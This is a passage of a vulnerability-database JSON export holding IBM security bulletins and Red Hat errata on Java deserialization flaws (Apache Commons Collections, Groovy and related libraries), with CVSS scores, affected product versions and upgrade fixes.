"confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-8103"], "modified": "2015-11-25T20:59:00", "id": "JENKINS_CLI_DESERIALIZATION", "href": "http://exploitlist.immunityinc.com/home/exploitpack/CANVAS/jenkins_cli_deserialization", "sourceData": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "ibm": [{"lastseen": "2023-02-21T01:44:41", "description": "## Summary\n\nApache Commons Collections and Apache Groovy vulnerabilities for handling Java object deserialization were addressed by IBM UrbanCode Build\n\n## Vulnerability Details\n\n**CVE-ID:** [CVE-2015-7450](<https://vulners.com/cve/CVE-2015-7450>) \n**Description:** Apache Commons Collections could allow a remote attacker to execute arbitrary code on the system, caused by the deserialization of 
data with Java InvokerTransformer class. By sending specially crafted data, an attacker could exploit this vulnerability to execute arbitrary Java code on the system. \n**CVSS Base Score: **9.8 \n**CVSS Temporal Score**: See <https://exchange.xforce.ibmcloud.com/vulnerabilities/107918> for the current score \n**CVSS Environmental Score*:** Undefined \n**CVSS Vector: **(CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H) \n \n**CVE-ID:** [CVE-2015-3253](<https://vulners.com/cve/CVE-2015-3253>) \n**Description:** Apache Groovy could allow a remote attacker to execute arbitrary code on the system, caused by the failure to isolate serialization code when using standard Java serialization mechanism to communicate between servers. An attacker could exploit this vulnerability to deserialize objects and execute arbitrary code on the system or cause a denial of service. \n**CVSS Base Score: **7.3 \n**CVSS Temporal Score**: See [](<http://xforce.iss.net/xforce/xfdb/103792>)<https://exchange.xforce.ibmcloud.com/vulnerabilities/104819> for the current score \n**CVSS Environmental Score*:** Undefined \n**CVSS Vector: **(CVSS:3.0/AV:N/AC:L/PR:N/UI:N/C:L/I:L/A:L)\n\n## Affected Products and Versions\n\nIBM UrbanCode Build 6.1.0, 6.1.0.1, 6.1.0.2, and 6.1.1 on all supported platforms.\n\n## Remediation/Fixes\n\nUpgrade to IBM UrbanCode Build 6.1.1.1.\n\n## Workarounds and Mitigations\n\nNone\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2018-06-17T22:32:15", "type": "ibm", "title": "Security Bulletin: Vulnerabilities in Apache Commons Collections and Apache Groovy affects IBM UrbanCode Build 
(CVE-2015-7450, CVE-2015-3253)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-3253", "CVE-2015-7450"], "modified": "2018-06-17T22:32:15", "id": "865491A8AE45D8889B4A4B68C631AF51173BD6FAC1388EA03C0A94F22F2C9462", "href": "https://www.ibm.com/support/pages/node/272069", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-06-24T05:52:38", "description": "## Summary\n\nIBM Security Verify Governance uses Apache Commons Collections library which is vulnerable to arbitrary code execution by an attacker by sending specially crafted serialized objects (CVE-2017-15708, CVE-2015-7501, CVE-2015-6420, CVE-2015-4852, CVE-2019-13116). The fix includes upgrading the Commons Collections jar to the patched version.\n\n## Vulnerability Details\n\n** CVEID: **[CVE-2017-15708](<https://vulners.com/cve/CVE-2017-15708>) \n** DESCRIPTION: **Apache Synapse could allow a remote attacker to execute arbitrary code on the system, caused by a flaw in the Apache Commons Collections. By injecting specially-crafted serialized objects, an attacker could exploit this vulnerability to execute arbitrary code on the system. \nCVSS Base score: 9.8 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/136262](<https://exchange.xforce.ibmcloud.com/vulnerabilities/136262>) for the current score. 
\nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H) \n \n** CVEID: **[CVE-2015-7501](<https://vulners.com/cve/CVE-2015-7501>) \n** DESCRIPTION: **Red Hat JBoss A-MQ 6.x; BPM Suite (BPMS) 6.x; BRMS 6.x and 5.x; Data Grid (JDG) 6.x; Data Virtualization (JDV) 6.x and 5.x; Enterprise Application Platform 6.x, 5.x, and 4.3.x; Fuse 6.x; Fuse Service Works (FSW) 6.x; Operations Network (JBoss ON) 3.x; Portal 6.x; SOA Platform (SOA-P) 5.x; Web Server (JWS) 3.x; Red Hat OpenShift/xPAAS 3.x; and Red Hat Subscription Asset Manager 1.3 allow remote attackers to execute arbitrary commands via a crafted serialized Java object, related to the Apache Commons Collections (ACC) library. \nCVSS Base score: 9.8 \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H) \n \n** CVEID: **[CVE-2015-6420](<https://vulners.com/cve/CVE-2015-6420>) \n** DESCRIPTION: **Serialized-object interfaces in certain Cisco Collaboration and Social Media; Endpoint Clients and Client Software; Network Application, Service, and Acceleration; Network and Content Security Devices; Network Management and Provisioning; Routing and Switching - Enterprise and Service Provider; Unified Computing; Voice and Unified Communications Devices; Video, Streaming, TelePresence, and Transcoding Devices; Wireless; and Cisco Hosted Services products allow remote attackers to execute arbitrary commands via a crafted serialized Java object, related to the Apache Commons Collections (ACC) library. \nCVSS Base score: 9.8 \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H) \n \n** CVEID: **[CVE-2015-4852](<https://vulners.com/cve/CVE-2015-4852>) \n** DESCRIPTION: **The WLS Security component in Oracle WebLogic Server 10.3.6.0, 12.1.2.0, 12.1.3.0, and 12.2.1.0 allows remote attackers to execute arbitrary commands via a crafted serialized Java object in T3 protocol traffic to TCP port 7001, related to oracle_common/modules/com.bea.core.apache.commons.collections.jar. 
NOTE: the scope of this CVE is limited to the WebLogic Server product. \nCVSS Base score: 9.8 \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H) \n \n** CVEID: **[CVE-2019-13116](<https://vulners.com/cve/CVE-2019-13116>) \n** DESCRIPTION: **MuleSoft Mule runtime could allow a remote attacker to execute arbitrary code on the system, caused by Java deserialization, related to Apache Commons Collections. By sending a specially-crafted request, an attacker could exploit this vulnerability to execute arbitrary code on the system. \nCVSS Base score: 9.8 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/169704](<https://exchange.xforce.ibmcloud.com/vulnerabilities/169704>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)\n\n## Affected Products and Versions\n\nAffected Product(s)| Version(s) \n---|--- \nIBM Security Verify Governance| 10.0 \n \n\n\n## Remediation/Fixes\n\nAffected Product(s)\n\n| \n\nVersion(s)\n\n| \n\nFirst Fix \n \n---|---|--- \n \nIBM Security Verify Governance\n\n| \n\n10.0.1\n\n| \n\n[10.0.1.0-ISS-ISVG-IGVA-FP0002](<https://www.ibm.com/support/fixcentral/swg/downloadFixes?parent=IBM%20Security&product=ibm/Tivoli/IBM+Security+Verify+Governance&release=10.0.0.0&platform=Linux&function=fixId&fixids=10.0.1.0-ISS-ISVG-IGVA-FP0002&includeRequisites=1&includeSupersedes=0&downloadMethod=http>) \n \n**IBM strongly recommends addressing the vulnerability now.**\n\n## Workarounds and Mitigations\n\nNone\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-11-22T16:37:00", "type": "ibm", 
"title": "Security Bulletin: IBM Security Verify Governance is vulnerable to arbitrary code execution due to use of Apache Commons Collections (multiple vulnerabilities)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": true, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-4852", "CVE-2015-6420", "CVE-2015-7501", "CVE-2017-15708", "CVE-2019-13116"], "modified": "2022-11-22T16:37:00", "id": "9A19B1A61B0A4ADFDBA9E428552BF21656703586B14AC314FFC9B663C7D9BDEB", "href": "https://www.ibm.com/support/pages/node/6841039", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-06-24T05:54:55", "description": "## Summary\n\nMultiple vulnerabilities in Apache Commons Collections used by IBM InfoSphere Information Server were addressed.\n\n## Vulnerability Details\n\n** CVEID: **[CVE-2015-4852](<https://vulners.com/cve/CVE-2015-4852>) \n** DESCRIPTION: **The WLS Security component in Oracle WebLogic Server 10.3.6.0, 12.1.2.0, 12.1.3.0, and 12.2.1.0 allows remote attackers to execute arbitrary commands via a crafted serialized Java object in T3 protocol traffic to TCP port 7001, related to oracle_common/modules/com.bea.core.apache.commons.collections.jar. NOTE: the scope of this CVE is limited to the WebLogic Server product. 
\nCVSS Base score: 9.8 \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H) \n \n** CVEID: **[CVE-2015-6420](<https://vulners.com/cve/CVE-2015-6420>) \n** DESCRIPTION: **Serialized-object interfaces in certain Cisco Collaboration and Social Media; Endpoint Clients and Client Software; Network Application, Service, and Acceleration; Network and Content Security Devices; Network Management and Provisioning; Routing and Switching - Enterprise and Service Provider; Unified Computing; Voice and Unified Communications Devices; Video, Streaming, TelePresence, and Transcoding Devices; Wireless; and Cisco Hosted Services products allow remote attackers to execute arbitrary commands via a crafted serialized Java object, related to the Apache Commons Collections (ACC) library. \nCVSS Base score: 9.8 \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H) \n \n** CVEID: **[CVE-2017-15708](<https://vulners.com/cve/CVE-2017-15708>) \n** DESCRIPTION: **Apache Synapse could allow a remote attacker to execute arbitrary code on the system, caused by a flaw in the Apache Commons Collections. By injecting specially-crafted serialized objects, an attacker could exploit this vulnerability to execute arbitrary code on the system. \nCVSS Base score: 9.8 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/136262](<https://exchange.xforce.ibmcloud.com/vulnerabilities/136262>) for the current score. 
\nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H) \n \n** CVEID: **[CVE-2015-7501](<https://vulners.com/cve/CVE-2015-7501>) \n** DESCRIPTION: **Red Hat JBoss A-MQ 6.x; BPM Suite (BPMS) 6.x; BRMS 6.x and 5.x; Data Grid (JDG) 6.x; Data Virtualization (JDV) 6.x and 5.x; Enterprise Application Platform 6.x, 5.x, and 4.3.x; Fuse 6.x; Fuse Service Works (FSW) 6.x; Operations Network (JBoss ON) 3.x; Portal 6.x; SOA Platform (SOA-P) 5.x; Web Server (JWS) 3.x; Red Hat OpenShift/xPAAS 3.x; and Red Hat Subscription Asset Manager 1.3 allow remote attackers to execute arbitrary commands via a crafted serialized Java object, related to the Apache Commons Collections (ACC) library. \nCVSS Base score: 9.8 \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H) \n \n** CVEID: **[CVE-2019-13116](<https://vulners.com/cve/CVE-2019-13116>) \n** DESCRIPTION: **MuleSoft Mule runtime could allow a remote attacker to execute arbitrary code on the system, caused by Java deserialization, related to Apache Commons Collections. By sending a specially-crafted request, an attacker could exploit this vulnerability to execute arbitrary code on the system. \nCVSS Base score: 9.8 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/169704](<https://exchange.xforce.ibmcloud.com/vulnerabilities/169704>) for the current score. 
\nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)\n\n## Affected Products and Versions\n\nAffected Product(s)| Version(s) \n---|--- \nInfoSphere Information Server| 11.7 \n \n\n\n## Remediation/Fixes\n\n_Product_| _VRMF_| _APAR_| _Remediation/First Fix_ \n---|---|---|--- \nInfoSphere Information Server, Information Server on Cloud| 11.7| [JR64991](<https://www.ibm.com/support/pages/apar/JR64991> \"JR64991\" ) \n| \\--Apply InfoSphere Information Server version [11.7.1.0](<https://www.ibm.com/support/docview.wss?uid=ibm10878310> \"11.7.1.0\" ) \n\\--Apply InfoSphere Information Server version [11.7.1.4](<https://www.ibm.com/support/pages/node/6620275> \"11.7.1.4\" ) \n \n## Workarounds and Mitigations\n\nNone\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-10-14T22:00:35", "type": "ibm", "title": "Security Bulletin: Multiple vulnerabilities in Apache Commons Collections affect IBM InfoSphere Information Server", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": true, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-4852", "CVE-2015-6420", "CVE-2015-7501", "CVE-2017-15708", "CVE-2019-13116"], "modified": 
"2022-10-14T22:00:35", "id": "DAB88099018B311F83DAFDB9431625A326A00FF72BE126856DCECA1262D7C308", "href": "https://www.ibm.com/support/pages/node/6829349", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-02-27T21:49:42", "description": "## Summary\n\nJazz for Service Management is affected with multiple vulnerabilities (CVE-2015-4852, CVE-2015-6420, CVE-2017-15708)\n\n## Vulnerability Details\n\n**CVEID: **CVE-2017-15708 \n**DESCRIPTION: **In Apache Synapse, by default no authentication is required for Java Remote Method Invocation (RMI). So Apache Synapse 3.0.1 or all previous releases (3.0.0, 2.1.0, 2.0.0, 1.2, 1.1.2, 1.1.1) allows remote code execution attacks that can be performed by injecting specially crafted serialized objects. And the presence of Apache Commons Collections 3.2.1 (commons-collections-3.2.1.jar) or previous versions in Synapse distribution makes this exploitable. To mitigate the issue, we need to limit RMI access to trusted users only. Further upgrading to 3.0.1 version will eliminate the risk of having said Commons Collection version. 
In Synapse 3.0.1, Commons Collection has been updated to 3.2.2 version\n\n**CVEID: **[](<https://vulners.com/cve/CVE-2019-17566>)CVE-2015-6420[](<https://vulners.com/cve/CVE-2019-17566>) \n**DESCRIPTION: ** Serialized-object interfaces in certain Cisco Collaboration and Social Media; Endpoint Clients and Client Software; Network Application, Service, and Acceleration; Network and Content Security Devices; Network Management and Provisioning; Routing and Switching - Enterprise and Service Provider; Unified Computing; Voice and Unified Communications Devices; Video, Streaming, TelePresence, and Transcoding Devices; Wireless; and Cisco Hosted Services products allow remote attackers to execute arbitrary commands via a crafted serialized Java object, related to the Apache Commons Collections (ACC) library\n\n**CVEID: **CVE-2015-4852 \n**DESCRIPTION: ** The WLS Security component in Oracle WebLogic Server 10.3.6.0, 12.1.2.0, 12.1.3.0, and 12.2.1.0 allows remote attackers to execute arbitrary commands via a crafted serialized Java object in T3 protocol traffic to TCP port 7001, related to oracle_common/modules/com.bea.core.apache.commons.collections.jar. NOTE: the scope of this CVE is limited to the WebLogic Server product.\n\n## Affected Products and Versions\n\n## Affected JazzSM versions\n\nAffected Product(s) | Version(s) \n---|--- \nJazz for Service Management | 1.1.3 - 1.1.3.8 \n \n## Remediation/Fixes\n\n1\\. Upgrade IBM Websphere Application Server (WAS) version to v8.5.5.17 or v8.5.5.18\n\n2\\. Move commons-collections.jar file from below path to another safe location \n\n<JazzSM Installed Location>/profile/installedApps/JazzSMNode01Cell/isc.ear\n\n3\\. Copy commons-collections.jar file from folder <WAS Installed Location>/systemApps/isclite.ear to <JazzSM Installed Location>/profile/installedApps/JazzSMNode01Cell/isc.ear\n\n4\\. 
Restart JazzSM profile server\n\n## Workarounds and Mitigations\n\nNone\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-10-20T11:33:26", "type": "ibm", "title": "Security Bulletin: IBM Jazz for Service Management (JazzSM) is affected with multiple vulnerabilities (CVE-2015-4852, CVE-2015-6420, CVE-2017-15708)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-4852", "CVE-2015-6420", "CVE-2017-15708", "CVE-2019-17566"], "modified": "2020-10-20T11:33:26", "id": "44D4BE9C6B3A5CA2D7E393A0C6B1DE6752C9B6BDF8F6BC23CA690D4063D3152B", "href": "https://www.ibm.com/support/pages/node/6350069", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "redhat": [{"lastseen": "2023-09-12T04:38:05", "description": "Red Hat JBoss Operations Network is a Middleware management solution that\nprovides a single point of control to deploy, manage, and monitor JBoss\nEnterprise Middleware, applications, and services.\n\nThis JBoss Operations Network 3.3.5 release serves as a replacement for\nJBoss Operations Network 3.3.4, and includes several bug fixes. 
Refer to\nthe Customer Portal page linked in the References section for information\non the most significant of these changes.\n\nThe following security issues are also fixed with this release:\n\nIt was found that the Apache commons-collections library permitted code\nexecution when deserializing objects involving a specially constructed\nchain of classes. A remote attacker could use this flaw to execute\narbitrary code with the permissions of the application using the commons-\ncollections library. (CVE-2015-7501)\n\nA flaw was discovered in the way applications using Groovy used the\nstandard Java serialization mechanism. A remote attacker could use a\nspecially crafted serialized object that would execute code directly\nwhen deserialized. All applications which rely on serialization and do\nnot isolate the code which deserializes objects are subject to this\nvulnerability. (CVE-2015-3253)\n\nAll users of JBoss Operations Network 3.3.4 as provided from the Red Hat\nCustomer Portal are advised to upgrade to JBoss Operations Network 3.3.5.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2016-02-03T14:54:58", "type": "redhat", "title": "(RHSA-2016:0118) Critical: Red Hat JBoss Operations Network 3.3.5 update", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": 
"AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": true, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-3253", "CVE-2015-7501"], "modified": "2019-02-20T12:25:07", "id": "RHSA-2016:0118", "href": "https://access.redhat.com/errata/RHSA-2016:0118", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-09-12T04:38:05", "description": "Red Hat JBoss A-MQ, based on Apache ActiveMQ, is a standards-compliant\nmessaging system that is tailored for use in mission critical applications.\n\nRed Hat JBoss A-MQ 6.2.1 is a micro product release that updates Red Hat\nJBoss A-MQ 6.2.0, and includes several bug fixes and enhancements. Refer to\nthe Release Notes document, available from the link in the References\nsection, for a list of changes.\n\nThe following security fixes are addressed in this release:\n\nIt was found that the Apache commons-collections library permitted code\nexecution when deserializing objects involving a specially constructed\nchain of classes. A remote attacker could use this flaw to execute\narbitrary code with the permissions of the application using the\ncommons-collections library. (CVE-2015-7501)\n\nFurther information about this issue may be found at:\nhttps://access.redhat.com/solutions/2045023\n\nA flaw was discovered that when an application uses Groovy (has it on the\nclasspath) and uses the standard Java serialization mechanism, an attacker\ncan bake a special serialized object that executes code directly when\ndeserialized. All applications which rely on serialization and do not\nisolate the code which deserializes objects are subject to this\nvulnerability. (CVE-2015-3253)\n\nIt was found that the JBoss A-MQ console would accept a string containing\nJavaScript as the name of a new message queue. Execution of the UI would\nsubsequently execute the script. 
An attacker could use this flaw to access\nsensitive information or perform other attacks. (CVE-2015-5181)\n\nRed Hat would like to thank Naftali Rosenbaum of Comsec Consulting for\nreporting CVE-2015-5181.\n\nAll users of Red Hat JBoss A-MQ 6.2.0 as provided from the Red Hat Customer\nPortal are advised to apply this update.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2015-12-07T20:42:21", "type": "redhat", "title": "(RHSA-2015:2557) Important: Red Hat JBoss A-MQ 6.2.1 update", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": true, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-3253", "CVE-2015-5181", "CVE-2015-7501"], "modified": "2019-02-20T12:24:14", "id": "RHSA-2015:2557", "href": "https://access.redhat.com/errata/RHSA-2015:2557", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-09-12T04:38:05", "description": "Red Hat JBoss Fuse, based on Apache ServiceMix, provides a small-footprint,\nflexible, open source enterprise service bus and integration platform.\n\nRed Hat JBoss Fuse 6.2.1 is a micro product release that updates Red Hat\nJBoss Fuse 6.2.0, and includes several bug fixes and enhancements. 
Refer to\nthe Release Notes document, available from the link in the References\nsection, for a list of changes.\n\nThe following security fixes are addressed in this release:\n\nIt was found that the Apache commons-collections library permitted code\nexecution when deserializing objects involving a specially constructed\nchain of classes. A remote attacker could use this flaw to execute\narbitrary code with the permissions of the application using the\ncommons-collections library. (CVE-2015-7501)\n\nFurther information about this issue may be found at:\nhttps://access.redhat.com/solutions/2045023\n\nA flaw was discovered that when an application uses Groovy (has it on the\nclasspath) and uses the standard Java serialization mechanism, an attacker\ncan bake a special serialized object that executes code directly when\ndeserialized. All applications which rely on serialization and do not\nisolate the code which deserializes objects are subject to this\nvulnerability. (CVE-2015-3253)\n\nIt was found that the JBoss A-MQ console would accept a string containing\nJavaScript as the name of a new message queue. Execution of the UI would\nsubsequently execute the script. An attacker could use this flaw to access\nsensitive information or perform other attacks. 
(CVE-2015-5181)\n\nRed Hat would like to thank Naftali Rosenbaum of Comsec Consulting for\nreporting CVE-2015-5181.\n\nAll users of Red Hat JBoss Fuse 6.2.0 are advised to apply this update.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2015-12-07T20:42:09", "type": "redhat", "title": "(RHSA-2015:2556) Important: Red Hat JBoss Fuse 6.2.1 update", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": true, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-3253", "CVE-2015-5181", "CVE-2015-7501"], "modified": "2019-02-20T12:24:40", "id": "RHSA-2015:2556", "href": "https://access.redhat.com/errata/RHSA-2015:2556", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-09-12T04:38:05", "description": "Red Hat JBoss Fuse, based on Apache ServiceMix, provides a small-footprint, flexible, open source enterprise service bus and integration platform.\n\nRed Hat JBoss Fuse 6.3 is a minor product release that updates Red Hat JBoss Fuse 6.2.1, and includes several bug fixes and enhancements. 
Refer to the Release Notes document, available from the Product Documentation link in the References section, for a list of these changes.\n\nSecurity Fix(es):\n\nIt was found that JGroups did not require necessary headers for encrypt and auth protocols from new nodes joining the cluster. An attacker could use this flaw to bypass security restrictions, and use this vulnerability to send and receive messages within the cluster, leading to information disclosure, message spoofing, or further possible attacks. (CVE-2016-2141)\n\nA deserialization flaw allowing remote code execution was found in the BeanShell library. If BeanShell was on the classpath, it could permit code execution if another part of the application deserialized objects involving a specially constructed chain of classes. A remote attacker could use this flaw to execute arbitrary code with the permissions of the application using the BeanShell library. (CVE-2016-2510)\n\nIt was found that Apache Shiro uses a default cipher key for its \"remember me\" feature. An attacker could use this to devise a malicious request parameter and gain access to unauthorized content. (CVE-2016-4437)\n\nA denial of service flaw was found in the way Spring processes inline DTD declarations. A remote attacker could submit a specially crafted XML file that would cause out-of-memory errors when parsed. (CVE-2015-3192)\n\nIt was found that Apache Camel's camel-xstream component was vulnerable to Java object deserialization. This vulnerability permits deserialization of data which could lead to information disclosure, code execution, or other possible attacks. (CVE-2015-5344)\n\nIt was found that Apache Camel's Jetty/Servlet permitted object deserialization. If using camel-jetty or camel-servlet as a consumer in Camel routes, then Camel will automatically deserialize HTTP requests that use the content-header: application/x-java-serialized-object. 
